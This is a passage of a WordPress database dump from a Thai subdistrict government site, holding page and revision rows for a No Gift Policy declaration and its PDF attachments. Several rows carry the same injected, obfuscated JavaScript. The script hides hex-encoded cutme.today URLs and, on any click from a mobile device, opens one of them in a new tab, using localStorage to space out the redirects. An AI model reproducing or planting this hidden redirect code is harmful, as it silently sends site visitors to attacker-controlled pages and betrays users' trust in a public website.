_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 11:47:56','2024-08-15 04:47:56','',14,'http://pakhaeng.ssk.in.th/?p=858',0,'revision','',0),
(859,1,'2024-08-15 11:53:41','2024-08-15 04:53:41','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"wide\"} -->\n<div class=\"wp-block-file alignwide\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b9%80%e0%b8%88%e0%b8%95%e0%b8%99%e0%b8%b2%e0%b8%a3%e0%b8%a1%e0%b8%93%e0%b9%8c%e0%b8%99%e0%b9%82%e0%b8%a2%e0%b8%9a%e0%b8%b2%e0%b8%a2-no-gift-po','','','2025-06-09 13:40:27','2025-06-09 06:40:27','',0,'http://pakhaeng.ssk.in.th/?page_id=859',0,'page','',0),
(860,1,'2024-08-15 11:52:41','2024-08-15 04:52:41','','O26 ประกาศเจตนารมณ์','','inherit','','closed','','o26-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b9%80%e0%b8%88%e0%b8%95%e0%b8%99%e0%b8%b2%e0%b8%a3%e0%b8%a1%e0%b8%93%e0%b9%8c','','','2024-08-15 11:52:41','2024-08-15 04:52:41','',859,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O26-ประกาศเจตนารมณ์.pdf',0,'attachment','application/pdf',0),
(861,1,'2024-08-15 11:53:35','2024-08-15 04:53:35','','ประกาศเจตนารมณ์','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b9%80%e0%b8%88%e0%b8%95%e0%b8%99%e0%b8%b2%e0%b8%a3%e0%b8%a1%e0%b8%93%e0%b9%8c','','','2024-08-15 11:53:35','2024-08-15 04:53:35','',859,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศเจตนารมณ์.pdf',0,'attachment','application/pdf',0),
(862,1,'2024-08-15 11:53:41','2024-08-15 04:53:41','<!-- wp:file {\"id\":861,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-6b47c02d-8d6a-4ba9-9951-4b4e4057946f\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6b47c02d-8d6a-4ba9-9951-4b4e4057946f\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2024-08-15 11:53:41','2024-08-15 04:53:41','',859,'http://pakhaeng.ssk.in.th/?p=862',0,'revision','',0),
(863,1,'2024-08-15 11:54:14','2024-08-15 04:54:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery 